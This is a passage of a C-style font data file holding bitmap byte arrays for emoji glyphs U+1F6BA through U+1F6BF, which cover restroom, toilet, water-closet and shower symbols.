0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6BA "🚺" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x1,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf2, 0x1,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf1, 0x0,
0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x80,
0x23, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x40,
0x11, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x20,
0x8, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x30,
0x6, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x10,
0x1, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x8,
0x0, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0x8c,
0x0, 0x63, 0xff, 0xff, 0xff, 0xff, 0xff, 0xee,
0x0, 0x3b, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x86, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc3, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe1, 0x8f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x63, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x31, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x18, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xcf, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6BB "🚻" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x87, 0xff, 0xff, 0xf8, 0x7f,
0xff, 0xff, 0xff, 0x80, 0xff, 0xff, 0xf0, 0x1f,
0xff, 0xff, 0xff, 0x80, 0x7f, 0xff, 0xf0, 0x7,
0xff, 0xff, 0xff, 0x80, 0x1f, 0xff, 0xf8, 0x3,
0xff, 0xff, 0xff, 0xc0, 0xf, 0xff, 0xfc, 0x1,
0xff, 0xff, 0xff, 0xe0, 0x7, 0xff, 0xfe, 0x0,
0xff, 0xff, 0xff, 0xf8, 0x7, 0xff, 0xff, 0x0,
0x7f, 0xff, 0xff, 0xfe, 0x3, 0xff, 0xff, 0xc0,
0x7f, 0xff, 0xff, 0xff, 0x87, 0xff, 0xff, 0xf0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc0, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0x80, 0x1f, 0xff, 0xf8,
0x3, 0xff, 0xff, 0xff, 0x80, 0x7, 0xff, 0xf8,
0x0, 0xff, 0xff, 0xff, 0xc0, 0x1, 0xff, 0xfc,
0x0, 0x7f, 0xff, 0xff, 0xc0, 0x0, 0xff, 0xfc,
0x0, 0x1f, 0xff, 0xff, 0xe0, 0x0, 0x7f, 0xfe,
0x0, 0xf, 0xff, 0xff, 0xf0, 0x0, 0x1f, 0xff,
0x0, 0x7, 0xff, 0xff, 0xf0, 0x0, 0xf, 0xff,
0x0, 0x1, 0xff, 0xff, 0xf8, 0x0, 0x7, 0xff,
0x80, 0x0, 0xff, 0xff, 0xfc, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x7f, 0xff, 0xfc, 0x40, 0x8, 0xff,
0xc4, 0x2, 0x1f, 0xff, 0xfe, 0x20, 0x4, 0x7f,
0xe2, 0x0, 0x8f, 0xff, 0xff, 0x10, 0x2, 0x1f,
0xf1, 0x0, 0x47, 0xff, 0xff, 0x8, 0x1, 0x8f,
0xf0, 0x80, 0x21, 0xff, 0xff, 0x8c, 0x0, 0xc7,
0xf8, 0xc0, 0x18, 0xff, 0xff, 0xc6, 0x0, 0x61,
0xfc, 0x40, 0x4, 0x7f, 0xff, 0xc3, 0x0, 0x38,
0xfc, 0x20, 0x2, 0x1f, 0xff, 0xe3, 0x80, 0x1c,
0x7e, 0x30, 0x1, 0x8f, 0xff, 0xfb, 0xc3, 0xf,
0x7f, 0xb8, 0x0, 0xef, 0xff, 0xff, 0xe1, 0x87,
0xff, 0xfc, 0x0, 0x7f, 0xff, 0xff, 0xf0, 0xc3,
0xff, 0xfc, 0x0, 0x1f, 0xff, 0xff, 0xf8, 0x61,
0xff, 0xfe, 0x0, 0xf, 0xff, 0xff, 0xfc, 0x30,
0xff, 0xff, 0x0, 0x7, 0xff, 0xff, 0xfe, 0x18,
0x7f, 0xff, 0x80, 0x3, 0xff, 0xff, 0xff, 0xc,
0x3f, 0xff, 0x80, 0x0, 0xff, 0xff, 0xff, 0x86,
0x1f, 0xff, 0xc0, 0x0, 0x7f, 0xff, 0xff, 0xc3,
0xf, 0xff, 0xfc, 0x61, 0xff, 0xff, 0xff, 0xe1,
0x87, 0xff, 0xfe, 0x30, 0xff, 0xff, 0xff, 0xf0,
0xc3, 0xff, 0xff, 0x18, 0x7f, 0xff, 0xff, 0xf8,
0x61, 0xff, 0xff, 0x8c, 0x3f, 0xff, 0xff, 0xfc,
0x30, 0xff, 0xff, 0xc6, 0x1f, 0xff, 0xff, 0xfe,
0x18, 0x7f, 0xff, 0xe3, 0xf, 0xff, 0xff, 0xff,
0xc, 0x3f, 0xff, 0xf1, 0x87, 0xff, 0xff, 0xff,
0x86, 0x1f, 0xff, 0xf8, 0xc3, 0xff, 0xff, 0xff,
0xc3, 0xf, 0xff, 0xfc, 0x61, 0xff, 0xff, 0xff,
0xf3, 0xcf, 0xff, 0xff, 0x79, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6BC "🚼" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0xf, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xe3, 0xff, 0x80, 0x3,
0xff, 0x8f, 0xff, 0xff, 0xe0, 0xff, 0x0, 0x0,
0x7f, 0x83, 0xff, 0xff, 0xf0, 0x3e, 0x0, 0x0,
0xf, 0x81, 0xff, 0xff, 0xf8, 0x4, 0x0, 0x0,
0x1, 0x0, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0xfc, 0x2, 0x0,
0x2, 0x1, 0xff, 0xff, 0xff, 0xff, 0xf, 0x0,
0x1, 0xe1, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xe0, 0x0, 0xef, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x38, 0x0, 0xe3, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xc, 0x0, 0xe0, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3, 0x0, 0x60, 0x3f, 0xff, 0xff, 0xff, 0xff,
0x3, 0xc0, 0x78, 0x1f, 0xff, 0xff, 0xff, 0xff,
0x3, 0xff, 0xfe, 0x7, 0xff, 0xff, 0xff, 0xff,
0xc0, 0xff, 0xfe, 0x7, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x3f, 0xfe, 0x3, 0xff, 0xff, 0xff, 0xff,
0xf8, 0xf, 0xfe, 0x3, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x3, 0xfe, 0x3, 0xff, 0xff, 0xff, 0xff,
0xff, 0x80, 0xfe, 0x3, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe0, 0x7f, 0x3, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x3f, 0x83, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x3f, 0xe3, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6BD "🚽" */
0x0, 0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x60, 0x6, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x7,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x7, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x7,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0,
0xff, 0xff, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x7,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x7, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x7,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x7, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x7,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x7, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x7,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x7, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x7,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x7, 0x7f, 0xff, 0xff, 0xf8, 0xe0, 0x7,
0xff, 0xff, 0xff, 0xfc, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xe, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x60, 0x0, 0x0, 0x0,
0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0, 0xe,
0x70, 0x0, 0x0, 0x0, 0x0, 0xc, 0x30, 0x0,
0x0, 0x0, 0x80, 0x1c, 0x38, 0x0, 0x0, 0x1,
0x80, 0x1c, 0x1c, 0x0, 0x0, 0x3, 0x80, 0x38,
0x1c, 0x0, 0x0, 0x7, 0x0, 0x70, 0xe, 0x0,
0x0, 0xf, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x1e,
0x1, 0xc0, 0x3, 0xc0, 0x0, 0x7c, 0x1, 0x80,
0x1, 0xf0, 0x7, 0xf8, 0x3, 0x0, 0x0, 0xf0,
0xf, 0xe0, 0x6, 0x0, 0x0, 0x70, 0xf, 0x0,
0xe, 0x0, 0x0, 0x60, 0x0, 0x0, 0xc, 0x0,
0x0, 0xe0, 0x0, 0x0, 0xc, 0x0, 0x0, 0xe0,
0x0, 0x0, 0xc, 0x0, 0x1, 0xc0, 0x0, 0x0,
0xc, 0x0, 0x1, 0xc0, 0x0, 0x0, 0xe, 0x0,
0x1, 0xc0, 0x0, 0x0, 0xe, 0x0, 0x3, 0x80,
0x0, 0x0, 0x6, 0x0, 0x3, 0x80, 0x0, 0x0,
0x6, 0x0, 0x3, 0x80, 0x0, 0x0, 0x6, 0x0,
0x7, 0x0, 0x0, 0x0, 0x7, 0x0, 0x7, 0x0,
0x0, 0x0, 0x7, 0x0, 0x7, 0xff, 0xff, 0xff,
0xff, 0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0x0,
/* U+1F6BE "🚾" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x7f, 0x83, 0xfc, 0x3f,
0xe0, 0x3f, 0xff, 0xfc, 0x3f, 0xc1, 0xfe, 0x1f,
0xc0, 0x3, 0xff, 0xfe, 0xf, 0xe0, 0xfe, 0xf,
0x80, 0x3, 0xff, 0xff, 0x7, 0xe0, 0x3f, 0x7,
0x80, 0x1, 0xff, 0xff, 0xc3, 0xf0, 0x1f, 0x87,
0xc0, 0xf8, 0xff, 0xff, 0xe1, 0xf8, 0xf, 0xc3,
0xc0, 0xff, 0xff, 0xff, 0xf0, 0x7c, 0x47, 0xc1,
0xe0, 0xff, 0xff, 0xff, 0xf8, 0x3c, 0x21, 0xe0,
0xe0, 0xff, 0xff, 0xff, 0xfe, 0x1e, 0x10, 0xf0,
0xf0, 0x7f, 0xff, 0xff, 0xff, 0xf, 0x8, 0x78,
0x78, 0x3f, 0xff, 0xff, 0xff, 0x87, 0x84, 0x3c,
0x3c, 0x1f, 0xff, 0xff, 0xff, 0xc1, 0x87, 0xc,
0x1e, 0xf, 0xff, 0xff, 0xff, 0xf0, 0xc3, 0x86,
0x1f, 0x7, 0xff, 0xff, 0xff, 0xf8, 0x61, 0xc3,
0xf, 0x83, 0xff, 0xff, 0xff, 0xfc, 0x30, 0xe1,
0x87, 0xc1, 0xff, 0xff, 0xff, 0xfe, 0x8, 0xf8,
0x83, 0xe0, 0xff, 0xff, 0xff, 0xff, 0x88, 0x7c,
0x43, 0xf8, 0x3f, 0xff, 0xff, 0xff, 0xc0, 0x3e,
0x1, 0xfc, 0x1f, 0xff, 0xff, 0xff, 0xe0, 0x1f,
0x0, 0xff, 0x3, 0xf3, 0xff, 0xff, 0xf0, 0x1f,
0xc0, 0x7f, 0x80, 0x1, 0xff, 0xff, 0xfc, 0xf,
0xe0, 0x7f, 0xe0, 0x0, 0xff, 0xff, 0xfe, 0x7,
0xf0, 0x3f, 0xf8, 0x0, 0x7f, 0xff, 0xff, 0x3,
0xf8, 0x1f, 0xff, 0x0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6BF "🚿" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xe3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x78, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1e, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x80, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xe0, 0x1f, 0x0, 0x0, 0x0, 0x1, 0xff,
0x83, 0xf8, 0xf, 0xe0, 0x0, 0x0, 0xf3, 0xff,
0xff, 0xf7, 0x83, 0xc0, 0x0, 0x0, 0x7f, 0xfc,
0x3, 0xfc, 0x39, 0xe0, 0x0, 0x0, 0x1f, 0xfe,
0x0, 0xf, 0x83, 0xf8, 0x0, 0x0, 0x3, 0x83,
0xf0, 0x0, 0x7c, 0x3e, 0x0, 0x0, 0x0, 0x7e,
0x1f, 0x0, 0x3, 0xc7, 0x80, 0x0, 0x0, 0xf,
0xf0, 0xf8, 0x0, 0x3c, 0x60, 0x0, 0x0, 0x1,
0xcf, 0x87, 0x80, 0x3, 0xdc, 0x0, 0x0, 0x0,
0x38, 0x78, 0x78, 0x0, 0x3f, 0x80, 0x0, 0x0,
0x3, 0x87, 0x87, 0xc0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x70, 0x3c, 0x3c, 0x0, 0x38, 0x0, 0x0,
0x0, 0x7, 0x3, 0xc3, 0xc0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x70, 0x3c, 0x3c, 0x0, 0x60, 0x0,
0x0, 0x0, 0xf, 0x3, 0xc3, 0xc0, 0xe, 0x0,
0x0, 0x0, 0x0, 0xf0, 0x3c, 0x3c, 0x1, 0xc0,
0x0, 0x0, 0x0, 0xf, 0x1, 0xc1, 0xc0, 0x18,
0x0, 0x0, 0x0, 0x0, 0xf0, 0x1c, 0x1c, 0x3,
0x0, 0x0, 0x0, 0x6, 0xf, 0x1, 0xe1, 0xc0,
0x70, 0x0, 0x0, 0x7, 0xc0, 0xf0, 0x1e, 0x1c,
0xe, 0x0, 0x0, 0x3, 0xf0, 0xf, 0x1, 0xe1,
0xc1, 0xc0, 0x0, 0x0, 0x7e, 0x0, 0xf0, 0x1e,
0x3c, 0x38, 0x0, 0x0, 0x1f, 0xc0, 0xf, 0x1,
0xe3, 0xc7, 0x0, 0x0, 0x3, 0xf0, 0x0, 0xf0,
0x1e, 0x3c, 0xe0, 0x0, 0x0, 0x7e, 0x0, 0xf,
0x1, 0xe3, 0x98, 0x0, 0x0, 0x7, 0x80, 0x0,
0xf0, 0x1e, 0x3b, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x1, 0xe7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0x1e, 0x7c, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x7, 0x81, 0xc7, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x80, 0x78, 0x1c, 0xe0, 0x0, 0x0, 0x0,
0x7, 0xf0, 0x7, 0x81, 0xce, 0x0, 0x0, 0x0,
0x1, 0xfc, 0x0, 0x78, 0x19, 0xc0, 0x0, 0x0,
